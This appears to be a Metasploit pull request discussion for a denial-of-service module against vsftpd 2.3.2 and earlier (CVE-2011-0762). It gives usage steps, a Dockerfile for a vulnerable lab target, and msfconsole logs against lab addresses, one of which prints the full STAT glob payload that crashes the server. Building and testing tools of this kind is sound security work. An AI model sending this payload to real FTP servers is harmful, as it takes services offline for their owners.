CVE-2011-0762 VSFTPD DOS attack

[rad10]

Vulnerable Application

This is an auxiliary for DOSing a VSFTPD server from version 2.3.3 and below.

Verification Steps

1. Start msfconsole
2. use auxiliary/dos/ftp/vstfpd_232
3. set rhosts
4. set ftpuser
5. set ftppass
6. run

Scenarios

VSFTPD 2.3.2 - Arch linux

msf6 > use auxiliary/dos/ftp/vsftpd_232
msf6 auxiliary(dos/ftp/vstfpd_232) > set rhosts 192.168.56.106
rhosts => 192.168.56.106
msf6 auxiliary(dos/ftp/vstfpd_232) > set verbose true 
verbose => true
msf6 auxiliary(dos/ftp/vstfpd_232) > run
[*] Running module against 192.168.56.106
[*] 192.168.56.106:21 - Connecting to FTP server 192.168.56.106:21...
[*] 192.168.56.106:21 - Connected to target FTP server.
[*] 192.168.56.106:21 - Authenticating as anonymous with password ...
[*] 192.168.56.106:21 - Sending password...
[*] 192.168.56.106:21 - Payload being sent: STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
[*] 192.168.56.106:21 - DDOS ended.
[*] Auxiliary module execution completed

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[rad10]

So I've tested the module and it works now. So is anything missing for merging?

[rad10]

If anyone is wanting to test this easily. Heres a dockerfile to make an image of the application data

FROM archlinux:latest as build
RUN pacman -Sy --noconfirm gcc make libnsl
RUN curl -O https://security.appspot.com/downloads/vsftpd-2.3.2.tar.gz
RUN tar zxf vsftpd-2.3.2.tar.gz
WORKDIR /vsftpd-2.3.2
RUN make
RUN mkdir -p /usr/share/empty/
RUN chmod +x /vsftpd-2.3.2/vsftpd
RUN mv /vsftpd-2.3.2/vsftpd /bin/vsftpd
RUN mv /vsftpd-2.3.2/vsftpd.conf /etc/vsftpd.conf
RUN chown root:root /etc/vsftpd.conf
EXPOSE 21
CMD [ "/bin/vsftpd" ]

[jheysel-r7]

If anyone is wanting to test this easily. Heres a dockerfile to make an image of the application data

FROM archlinux:latest as build
RUN pacman -Sy --noconfirm gcc make libnsl
RUN curl -O https://security.appspot.com/downloads/vsftpd-2.3.2.tar.gz
RUN tar zxf vsftpd-2.3.2.tar.gz
WORKDIR /vsftpd-2.3.2
RUN make
RUN mkdir -p /usr/share/empty/
RUN chmod +x /vsftpd-2.3.2/vsftpd
RUN mv /vsftpd-2.3.2/vsftpd /bin/vsftpd
RUN mv /vsftpd-2.3.2/vsftpd.conf /etc/vsftpd.conf
RUN chown root:root /etc/vsftpd.conf
EXPOSE 21
CMD [ "/bin/vsftpd" ]

Thank you for this! I just got this working and was just about to suggest adding similar steps to the vulnerable application section in the documentation. I'll add a suggestion to the docs with this dockerfile, very nice and concise.

[rad10]

Anything left before were ready to launch?

[jheysel-r7]

Anything left before were ready to launch?

One last nit pick @rad10 - I know msf_tidy doesn't pick this up as being incorrect and there are multiple different ways of listing module options in the codebase. However we're moving towards the following pattern:

metasploit-framework/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md

Lines 13 to 38 in fa6d168

	## Options
	### CA
	The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
	### CERT_TEMPLATE
	The certificate template to issue, e.g. "User".
	### ALT_DNS
	Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
	### ALT_UPN
	Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
	format `$username@$dnsDomainName`.
	### PFX
	Certificate to request on behalf of. This is a PKCS12 file (using the .pfx extension), such as a one generated by
	previously running this module.
	### ON_BEHALF_OF
	Username to request on behalf of. This is in the format `$domain\\$username`.
	### DigestAlgorithm
	*This is an advanced option.*
	The digest algorithm to use for cryptographic signing operations.

Where each module option is a subtitle of ## Options. I've added a suggestion. Thanks so much for being so responsive and accommodating through out this review, it's really appreciated!

[jheysel-r7]

Final testing with latest changes:

msf6 > use auxiliary/dos/ftp/vsftpd_232
msf6 auxiliary(dos/ftp/vsftpd_232) > set ftpuser anonymous
ftpuser => anonymous
msf6 auxiliary(dos/ftp/vsftpd_232) > set ftppass ''
ftppass =>
msf6 auxiliary(dos/ftp/vsftpd_232) > set rhosts 172.16.199.141
rhosts => 172.16.199.141
msf6 auxiliary(dos/ftp/vsftpd_232) > set rport 8888
rport => 8888
msf6 auxiliary(dos/ftp/vsftpd_232) > options

Module options (auxiliary/dos/ftp/vsftpd_232):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FTPPASS                   no        The password for the specified username
   FTPUSER  anonymous        no        The username to authenticate as
   RHOSTS   172.16.199.141   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                       asploit.html
   RPORT    8888             yes       The target port (TCP)


View the full module info with the info, or info -d command.

msf6 auxiliary(dos/ftp/vsftpd_232) > run
[*] Running module against 172.16.199.141

[*] 172.16.199.141:8888 - sending payload
....
[+] 172.16.199.141:8888 - Stream was cut off abruptly. Appears DOS attack succeeded.
[*] Auxiliary module execution completed

[jheysel-r7]

Release Notes

This PR adds an auxiliary for DOSing a VSFTPD server from version 2.3.2 and below.